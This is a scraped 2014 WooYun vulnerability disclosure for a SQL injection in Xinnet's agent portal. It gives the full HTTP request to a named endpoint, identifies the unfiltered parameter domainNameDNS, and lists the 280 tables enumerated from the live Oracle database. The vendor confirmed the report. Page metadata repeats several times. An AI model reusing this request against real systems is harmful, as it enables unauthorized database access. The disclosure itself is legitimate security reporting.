新网代理商系统Oracle注入漏洞一枚 | wooyun-2014-070448| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070448

漏洞标题：新网代理商系统Oracle注入漏洞一枚

漏洞作者：路人哥哥

提交时间：2014-07-31 12:59

修复时间：2014-09-14 13:00

公开时间：2014-09-14 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-07-31：细节已通知厂商并且等待厂商处理中
2014-07-31：厂商已经确认，细节仅向厂商公开
2014-08-10：细节向核心白帽子及相关领域专家公开
2014-08-20：细节向普通白帽子公开
2014-08-30：细节向实习白帽子公开
2014-09-14：细节向公众公开

简要描述：

新网代理站Oracle注入漏洞一枚

详细说明：

POST /web/DomainTransferAction.do?method=isTemporary HTTP/1.1
Host: agent.xinnet.com
Proxy-Connection: keep-alive
Content-Length: 113
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://agent.xinnet.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://agent.xinnet.com/domain/manage.do?method=list&serviceState=02&forward=inusing
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: Hm_lvt_4a3d4*****3ad11805cc3dc1e4a=1403000256,1405233427; _ga=GA1.2.1504825920.1396931326; BIGipServerdlqiantai_10.3.1.16_17=285278986.36895.0000; JSESSIONID= 
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.2
domainNameDNS=test.com&tempm=21ca4197203ae23a****e960edae58&newString=4423ac355902b******eec661142e56&flag=2

参数domainNameDNS未过滤

漏洞证明：

证明截图

Database: XINNET
[280 tables]
+--------------------------------+
| None                           |
| AGENT_ACCOUNT                  |
| AGENT_ACCOUNTDETAIL            |
| AGENT_AGENT                    |
| AGENT_AGENT_BAK_20131008       |
| AGENT_AGENT_TMP                |
| AGENT_AUTHORIZED               |
| AGENT_CONTRACT                 |
| AGENT_GRANT                    |
| AGENT_LEVEL                    |
| AGENT_LEVELADJUST              |
| AGENT_LEVELADJUST_MANUAL       |
| AGENT_LEVELCONDITION           |
| AGENT_LEVELRULE                |
| AGENT_RECEPTION                |
| AGENT_RECEPTION_VALIDATE       |
| AGENT_TRANSFERSETTING          |
| AGENT_USERINFO                 |
| API_APPLY                      |
| API_SETTING                    |
| BAK1231SERVICE_VIRTUALHOSTTRAN |
| CHINACNBAK20090202             |
| CORE_PROVINCE                  |
| DN                             |
| DOMAIN_AUDIT                   |
| DOMAIN_EN                      |
| DOMAIN_UNPASS_REASON           |
| EXPDP_XINNET_20100731_020001   |
| EXPDP_XINNET_20100801_140002   |
| EXPDP_XINNET_20100802_020001   |
| EXPDP_XINNET_20100802_080001   |
| EXPDP_XINNET_20100803_140001   |
| EXPDP_XINNET_20101023_220001   |
| EXPDP_XINNET_20101030_060001   |
| EXPDP_XINNET_20101030_220001   |
| EXPDP_XINNET_20101102_060001   |
| EXPDP_XINNET_20101102_220001   |
| EXPDP_XINNET_20101105_220001   |
| EXPDP_XINNET_20101109_060001   |
| EXPDP_XINNET_20101112_060002   |
| EXPDP_XINNET_20101112_220001   |
| EXPDP_XINNET_20101118_060001   |
| EXPDP_XINNET_20110615_224735   |
| EXPDP_XINNET_20110616_224731   |
| EXPDP_XINNET_20110617_061838   |
| EXPDP_XINNET_20110617_224742   |
| EXPDP_XINNET_20110618_061831   |
| EXPDP_XINNET_20110618_224728   |
| EXPDP_XINNET_20110619_061837   |
| EXPDP_XINNET_20110619_224729   |
| EXPDP_XINNET_20110620_061839   |
| EXPDP_XINNET_20110620_224733   |
| EXPDP_XINNET_20110915_225453   |
| EXPDP_XINNET_20111006_225533   |
| EXPDP_XINNET_20111013_225635   |
| EXPDP_XINNET_20111022_225651   |
| EXPDP_XINNET_20111116_225857   |
| EXPDP_XINNET_20111117_225622   |
| EXPDP_XINNET_20111118_223308   |
| EXPDP_XINNET_20111120_220333   |
| EXPDP_XINNET_20111122_220317   |
| EXPDP_XINNET_20111123_220304   |
| EXPDP_XINNET_20111124_104204   |
| FENGLING_DOMAIN_33W            |
| FENGLING_DOMAIN_BEIAN          |
| FENGLING_DOMAIN_ZILIAO         |
| FINANCE_AGENTINVOICE           |
| FINANCE_AGENTINVOICE_DELETE    |
| FINANCE_CAPINFO                |
| FINANCE_GATHERING              |
| FINANCE_GATHERINGDETAIL        |
| FINANCE_GATHERINGINVOICE       |
| FINANCE_GATHERINGMODE          |
| FINANCE_LOANRATING             |
| FINANCE_PAYMENT                |
| FINANCE_PAYMENTDETAIL          |
| FINANCE_PAYMENTMODE            |
| GLB_IP                         |
| GOODS_COSTLIMITPRICE           |
| GOODS_GOODS                    |
| GOODS_GOODS090331              |
| GOODS_GOODSITEM                |
| GOODS_GOODSITEMCOSTLIMITPRICE  |
| GOODS_GOODS_20131228           |
| GOODS_PROMOTION                |
| GOODS_PROMOTIONPRICE           |
| GOODS_TASTE                    |
| ICP_CDN_REASON                 |
| ICP_CDN_VERIFY                 |
| INVOICE_POST_INFO              |
| INVOICE_QUALIFICATION_INFO     |
| IPDEL                          |
| IPDEL1                         |
| LOG_AGENTLOG                   |
| LOG_DCP                        |
| LOG_DOMAINBIZ                  |
| LOG_DOMAINBIZ_20140301         |
| LOG_DOMAINFAILED               |
| LOG_DOMAINLOG                  |
| LOG_DOMAINTEMPLATE             |
| LOG_LOGIN                      |
| LOG_PRODUCTLOG                 |
| ORDER_FEE                      |
| ORDER_FEEITEM                  |
| ORDER_HANDLINGCHARGE           |
| ORDER_ORDER                    |
| ORDER_ORDERLINE                |
| ORDER_ORDERLINEFEE             |
| ORDER_ORDERLINEINFO            |
| ORDER_TOTALMONEY               |
| PRICE_GOODSITEMPRICE           |
| PRICE_GOODSITEMPRICE_20130402  |
| PRICE_GOODSITEMPRICE_20130403  |
| PRICE_GOODSITEMPRICE_20130723  |
| PRICE_PRICE                    |
| PRICE_REGIONGOODSITEMPRICE     |
| PRICE_REGIONPRICE              |
| PRICE_RENEWPRICE               |
| PRODUCT_AGREEMENT              |
| PRODUCT_COSTLIMITPRICE         |
| PRODUCT_DOMAINTYPE             |
| PRODUCT_MAILGLOBAL             |
| PRODUCT_NOTIFY                 |
| PRODUCT_NOTIFYBAK              |
| PRODUCT_PARAMETER              |
| PRODUCT_PARAMETERGROUP         |
| PRODUCT_PRODUCT                |
| PRODUCT_PRODUCT090331          |
| PRODUCT_PRODUCTAGREEMENT       |
| PRODUCT_PRODUCTCLASS           |
| PRODUCT_PRODUCTCLASS_20131228  |
| PRODUCT_PRODUCTMANAGER         |
| PRODUCT_PRODUCTNOTIFY          |
| PRODUCT_PRODUCT_20131228       |
| PRODUCT_PROVIDER               |
| PRODUCT_PROVIDERMANAGER        |
| PRODUCT_PROVIDERUSERINFO       |
| PRODUCT_SERVERGROUP            |
| PRODUCT_SERVICETYPE            |
| PRODUCT_SERVICETYPE_20131229_1 |
| PRODUCT_SUBPRODUCT             |
| PRODUCT_SUBPRODUCT_20131229_1  |
| PRODUCT_UPGRADELINE            |
| PRODUCT_UPGRADELINEINFO        |
| QY_AGAIN                       |
| QY_BD_MAIL                     |
| QY_BD_MAIL_HY                  |
| QY_C                           |
| QY_H1                          |
| QY_H2                          |
| QY_H3                          |
| QY_HOSTCLUB                    |
| QY_M                           |
| QY_MAILBAK20091105             |
| REAL_NAME_CDN_REASON           |
| REGION                         |
| SALE_ORGANLEVEL                |
| SALE_ORGANLEVELINFO            |
| SALE_ORGANRANGE                |
| SALE_SALEGROUP                 |
| SALE_SALESLEVEL                |
| SALE_SALESMAN                  |
| SALE_SALESMANGROUP             |
| SALE_SALESMANLEVEL             |
| SALE_TASK                      |
| SERVCENTER_ADVICE              |
| SERVCENTER_ADVICERE            |
| SERVCENTER_QUESTION            |
| SERVCENTER_RESEARCH            |
| SERVCENTER_RESEARCHLOG         |
| SERVCENTER_RESEARCHOPTION      |
| SERVCENTER_RESEARCHQUESTION    |
| SERVCENTER_RESEARCHRESULT      |
| SERVCENTER_SERVDOC             |
| SERVCENTER_SERVFAQ             |
| SERVCENTER_SERVMAILTASK        |
| SERVCENTER_SERVMAILTEMPLET     |
| SERVCENTER_SERVNOTIFY          |
| SERVCENTER_SERVTYPE            |
| SERVICE_CHECKCODE              |
| SERVICE_DOMAINCHANGEOWNER      |
| SERVICE_DOMAINDEL              |
| SERVICE_DOMAINEX               |
| SERVICE_DOMAINGOVCN            |
| SERVICE_DOMAINICP              |
| SERVICE_DOMAINNAMESERVER       |
| SERVICE_DOMAINPHOTO            |
| SERVICE_DOMAINPOLL             |
| SERVICE_DOMAINPRE              |
| SERVICE_DOMAINQUESTIONERESET   |
| SERVICE_DOMAINRENEW            |
| SERVICE_DOMAINSUBPRODUCT       |
| SERVICE_DOMAINTEMPLATE         |
| SERVICE_DOMAINTEMPLATEDEL      |
| SERVICE_DOMAINTRANSATION       |
| SERVICE_DOMAINTRANSFER         |
| SERVICE_DOMAINTRANSFERAGENT    |
| SERVICE_DOMAINUSERINFO         |
| SERVICE_DOMAINUSERINFODEL      |
| SERVICE_DOMAIN_0920            |
| SERVICE_DOMAIN_AUDIT_CHANGE    |
| SERVICE_DOMAIN_HB_FAIL         |
| SERVICE_DOMAIN_MBV             |
| SERVICE_DOMAIN_TEST_TEMP       |
| SERVICE_HOST090331             |
| SERVICE_ICPDOMAIN              |
| SERVICE_MAIL                   |
| SERVICE_MAIL090331             |
| SERVICE_MAILDEL                |
| SERVICE_MAILPRE                |
| SERVICE_MAILSUBPRODUCT         |
| SERVICE_MAILTRANSFERAGENT      |
| SERVICE_MAILUPGRADE            |
| SERVICE_MAILVIP_BAKO903        |
| SERVICE_MAIL_YDP               |
| SERVICE_TASTE                  |
| SERVICE_TEMPLATEDOMAIN         |
| SERVICE_TEMPLATEREGUSER        |
| SERVICE_TEMPLATEVERIFY         |
| SERVICE_VHOSTTRANSFERAGENT     |
| SERVICE_VIRTUALHOST            |
| SERVICE_VIRTUALHOSTDEL         |
| SERVICE_VIRTUALHOSTDEL20130531 |
| SERVICE_VIRTUALHOSTPRE         |
| SERVICE_VIRTUALHOSTPRE20130531 |
| SERVICE_VIRTUALHOSTPRE_130820  |
| SERVICE_VIRTUALHOSTPRE_BAKLI   |
| SERVICE_VIRTUALHOSTSUBPRODUCT  |
| SERVICE_VIRTUALHOSTTRAN        |
| SERVICE_VIRTUALHOSTUPGRADE     |
| SERVICE_VIRTUALHOST_20111114   |
| SERVICE_VIRTUALHOST_CHAR       |
| SERVICE_VIRTUALHOST_X1         |
| SERVICE_VZZJZ                  |
| SERVICE_VZZJZDEL               |
| SERVICE_VZZJZPRE               |
| SERVICE_VZZJZUPGRADE           |
| SERVICE_VZZJZ_BUTTON           |
| SPECIAL_CLOUD_HOST             |
| SYS_ACCOUNT                    |
| SYS_EXPORT_SCHEMA_01           |
| SYS_EXPORT_SCHEMA_02           |
| SYS_EXPORT_SCHEMA_03           |
| TEMP_CUSTOMER                  |
| TEMP_ICP_MYSQL                 |
| TEMP_ICP_RESULT2               |
| TEMP_ICP_RESULT3               |
| TEMP_REG                       |
| TEMP_REG1                      |
| TEMP_REG2                      |
| TEMP_ZYYDOMAIN                 |
| TEST_SEQ                       |
| TEST_SERVCIECOUNT              |
| T_THEME                        |
| T_THEME_COLOR                  |
| T_THEME_GRADE                  |
| T_THEME_INDUSTRY               |
| VHOST_IP_CNAME                 |
| VHOST_USER_NAME                |
| VHOST_YEWU                     |
| VHOST_YUNWEI                   |
| VPN_AGENT_ACCOUNT              |
| VPN_AGENT_AGENT                |
| VPN_AGENT_USERINFO             |
| VPN_API_SETTING                |
| VPN_PRODUCT_MAILGLOBAL         |
| VPN_SERVICE_DOMAIN             |
| VPN_SERVICE_DOMAINDEL          |
| VPN_SERVICE_DOMAINEX           |
| VPN_SERVICE_DOMAINTRANSFER     |
| VPN_SERVICE_MAIL               |
| VPN_SERVICE_VIRTUALHOST        |
| VPS_CONFIGURATION              |
| VPS_CONFIGURATION_DETAIL       |
| VPS_SERVICEINFO                |
| VPS_SERVICE_BIND               |
| VPS_SERVICE_BSS                |
| VZZJZGL_APPLY                  |
| WOSHIMC                        |
| ZYY_DOMAINPRODUCT_BAK          |
+--------------------------------+

修复方案：

版权声明：转载请注明来源路人哥哥@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-07-31 13:16

厂商回复：

非常感谢路人哥哥@乌云，小新正在玩命确认及修复中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070448

漏洞标题：新网代理商系统Oracle注入漏洞一枚

相关厂商：新网华通信息技术有限公司

漏洞作者：路人哥哥

提交时间：2014-07-31 12:59

修复时间：2014-09-14 13:00

公开时间：2014-09-14 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人哥哥@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070448

漏洞标题：新网代理商系统Oracle注入漏洞一枚

相关厂商：新网华通信息技术有限公司

漏洞作者： 路人哥哥

提交时间：2014-07-31 12:59

修复时间：2014-09-14 13:00

公开时间：2014-09-14 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-070448"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人哥哥@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人哥哥

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人哥哥@乌云